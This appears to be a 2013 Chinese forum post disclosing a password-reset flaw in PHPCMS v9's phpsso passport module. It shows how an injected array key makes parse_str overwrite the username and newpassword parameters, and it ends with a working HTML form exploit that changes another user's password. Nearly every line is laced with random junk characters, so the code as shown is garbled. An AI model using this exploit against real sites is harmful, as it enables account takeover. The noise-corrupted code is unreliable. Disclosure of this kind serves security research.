提到的通行证的代码:9 P! P! ^$ J5 Z' F8 u% P
3 W, }; l) O. G7 f$ c: D7 E% h2 C! z \, Z- z2 t& z1 G
parse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data);5 g! L; Q8 _; b/ ~0 q# M
" A/ M7 x* h0 S% p: C8 a
在phpsso_server/phpcms/modules/phpsso/classes/phpsso.class.php中。
1 `! t+ }9 M2 @1 q0 o# L) T
& u+ p w. ?8 N+ a0 X D1 e我把它留给了你们。+ Z/ k; e. E- O& ~# X ]
不知道你们发现了它没有。( u" M' l! p g: x- u, ^3 T, Y
/ J$ R) S" Q% h: z: J) I% D我们知道parse_str类似将http请求转换成php变量的函数,所以,也像http请求在php的环境下一样,如果提交?a=sss&a=aaa,那么a的结果会是aaa,不是sss。8 q4 w3 V5 A8 E8 r( ~ k
$ U5 n/ d; J$ E3 U, N' v0 |: i所以我们知道这个函数有一个问题了,如果后面提交一个内容,它会覆盖前面的。5 }; |1 c- n, i) }
! K) t' Y! j! |+ j也就是& t( e! t# m; x; @
' v1 }& d9 M/ h4 V* J
username=zhangsan&username=lisi的话,那么用户名就不是zhangsan了。0 v: W' D! L, W3 R8 }
O: Z1 _1 V' c; O: A2 o
要构造这样的请求,我们还是要回到通行证的client看看,我们有没有这样的机会。
% A2 J6 i9 Q& v8 v5 R$ |# X! ? b" u7 p
9 B; m* }$ @ i) p6 C9 U8 |# I其实我们有这样的机会,看看代码,如下:
T6 G3 T+ t0 E' x2 z$ s( b; B; J9 A- l& M' F
- d8 W6 H4 ~ `8 C3 Spublic function auth_data($data) {
% r4 ~8 H5 F, t. ~* v6 A, c$ _9 z) f7 C# p $s = $sep = '';
# ^: i% X" H% C6 w# W0 ~ foreach($data as $k => $v) {8 q. `: f2 P, n0 w
if(is_array($v)) {
1 J* R3 D7 c9 l8 \( ?. m t $s2 = $sep2 = '';
; h9 R2 f, m) w foreach($v as $k2 => $v2) { m0 k4 z( k3 Y% ]( V' a% Q
$s2 .= "$sep2{$k}[$k2]=".$this->_ps_stripslashes($v2);; a6 v3 I/ A: f/ [: h/ ?0 Q& a3 I6 Z
$sep2 = '&';, Y6 {- o6 ^+ j8 U8 L7 ~
}$ C1 C% Z4 C% W
$s .= $sep.$s2;
% p! ^! y. A- `9 q } else {
! c& w7 Z3 \4 t; p( _' \ $s .= "$sep$k=".$this->_ps_stripslashes($v);) h, O5 w6 j$ M9 B
}
6 s) b/ r: b8 `% Y6 [, v6 a3 B) x $sep = '&';6 d* ]7 Z+ ?- _" ?/ g
}
. t% G1 I9 T: Q4 o! w$ Y( m: {" m5 H- D" e
$auth_s = 'v='.$this->ps_vsersion.'&appid='.APPID.'&data='.urlencode($this->sys_auth($s));2 o. m+ n2 ?) ? V/ w& Q8 O# S
return $auth_s;
. B/ C% m, M. _. e }
5 H$ z8 m' y! b3 _5 B. i2 B
0 r! P# N1 i7 {8 J可能我没说明白,对,传递进来的数组的key是可控的。如果我的key里包含[]&这样三个字符的话,那么我就能重写这样的东西。
. z; e" c3 X. e. p# F* A& g% v/ a3 M2 o; w
举个例子
+ \$ w6 l" B" i% j$ s" G8 C" ^0 D* V _4 D0 x- Q
$a[aaa=a&bbb] = 'a';) h6 p8 T. Y5 W8 t% t5 A5 D% A7 f
* z1 m2 c" v% C! T) E会变成aaa=a&bbb=a
% v; d" r6 ~. R5 H3 v- `
2 L4 r# ]+ }& F; ^2 F9 M明白了么,对,就是通过没有注意到的key,我们可以构造出多余的参数来。2 R0 { }4 C/ e0 G) o, T, [. h, E
! q' W3 X% D8 m% X这个时候,我们可以再去看一个函数。6 v) N3 J# y. I3 R. [, S) V
) k3 c1 t, u7 U; ^就在这个文件内:
2 B7 l6 V; @( @/ E3 G7 q+ u, q1 H4 K' A$ a
, _/ o' I/ Z( W" P
public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='') {+ o* [ l" {4 {( B8 R j$ P }
if($email && !$this->_is_email($email)) {& u6 x/ ~. W; g+ ?
return -4;6 ]- J. j! u; K- H3 N7 q* s
}" |! g: V: |+ M8 O/ C5 [
return $this->_ps_send('edit', array('username'=>$username, 'password'=>$password, 'newpassword'=>$newpassword, 'email'=>$email, 'uid'=>$uid, 'random'=>$random));, R+ V8 J! S3 q) h' |- \: ]
}& V1 \, z3 J. N
1 e/ Q; ^- _) o& K8 e! o
这是向通行证发了这样一个请求。" F" \$ N7 V. l( I8 K/ s \
$ y$ u, B. ^5 @1 T我们再跟到通信证代码里去看看,就会有所发现。4 a; w: D6 ~1 A2 ]: r' Y1 y
# T, J* S* |+ u8 W# O- M0 v0 L7 x
1 n: B$ b8 E c5 O
public function edit() {
* S5 C4 g6 f' p8 ^% Y//能省就省,太长了不是吗?
" c& n$ ~5 r6 M
2 }0 |$ w' J% {if($this->username) {
, L# O0 @. z, h4 N/ Z//如果提交了用户名,则按照用户名修改记录,反之,按照uid来修改记录。! `) W% c7 [6 o$ J$ j/ P
$res = $this->db->update($data, array('username'=>$this->username));6 [1 d9 P+ X3 F5 ?2 J: K: u# A
} else {
" b/ V7 G# F: Q) a* T file_put_contents('typeb.txt',print_r($data,1).$this->uid);
, o% r1 E% Q; p, i4 L/ l: d" @ $res = $this->db->update($data, array('uid'=>$this->uid));& x9 F, ?6 s: A4 u
}, V# v5 [3 N0 s/ o
. m5 _1 N5 b, z" O好,我们知道了,如果提交了用户名,就会按照用户名来修改记录,不然就按照uid,我们看看函数结构:
) j3 X* }5 A; @4 I; e& b; _; V2 r( K# c- g9 K- y) x
public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='')
" D8 l" H* b4 |: }8 i z6 M+ J$ [% h4 T b
很好,uid要是无法控制的话,后面只剩下一个random了,但是username就在第一个,只要email,password,newpassword,有任何一个可以控制,就可以修改密码了。( W6 }2 N& c7 S& U* w; s0 q
% V; m6 v! f9 I2 p) i$ k% v
我当然找到了:
8 G9 J4 D3 F0 {$ ~' Zphpcms9/phpcms/modules/member/index.php
* t' d6 d" z( S% n5 q% ?9 d+ C* W ~: |; a& b
$res = $this->client->ps_member_edit('', $email, $_POST['info']['password'], $_POST['info']['newpassword'], $this->memberinfo['phpssouid'], $this->memberinfo['encrypt']);
; m. r9 D' F$ E: p8 b
) k3 U& w, E6 `# |8 e% M然后就没有然后了。0 R2 C P4 O7 s8 n( f
! d) g' U! E# }- Q' q2 B3 f. i
<form method="post" action="http://localhost/phpcms9/index.php?m=member&c=index&a=account_manage_password&t=1" id="myform" name="myform"># o5 Y# T7 o+ t4 ]2 c5 i
<table width="100%" cellspacing="0" class="table_form">
! A( _- ?5 t( ?% J7 ? <tr>- y% C. f; z, C3 E
<th width="80">邮箱:</th> & v7 j$ |4 v" {: o* z4 m
<td><input name="info[email]" type="text" id="email" size="30" value="jj@jj.com" class="input-text"></td>
0 E8 ]/ u$ B8 O$ K& g3 j </tr>
( ]3 H& d. E }* C/ _ U; ] <tr>
5 n) [+ k" d( k6 A <th width="80">原密码:</th> 8 o2 f( O) r" @, I4 ~
<td><input name="info[password]" type="password" id="password" size="30" value="111111" class="input-text"></td>: A0 u- S, ?5 F1 f9 D
</tr>) \1 w8 y/ f, ?3 V: {
<tr>& q H. U; ^9 L% ? l
<th>新密码:</th>8 F4 {1 ^1 N4 C! F6 m) d9 U4 J
<td><input name="info[newpassword][%5D=aaa%5D%5B&username=cc&newpassword=aaaaaa&]" type="password" id="newpassword" size="30" value="" class="input-text"></td>6 n; n/ x) I C B& v: {3 O
</tr>
5 x# k- D; W+ ~3 @$ g. J+ U <th></th>
5 M: q+ k6 c$ F0 H" l <td><input name="dosubmit" type="submit" id="dosubmit" value="提交" class="button"></td>
n5 [% @$ ]# s9 w8 o </tr>
; R* ^5 l" O4 ~ </table> M' k7 U) g' z2 I! }- a
! g. @* c' C! t+ l* P+ W
% K% G! b3 C# d. I Y
</form>4 t7 I) C' z2 ^
|
发表于 2013-2-23 14:46:35
收藏
支持
反对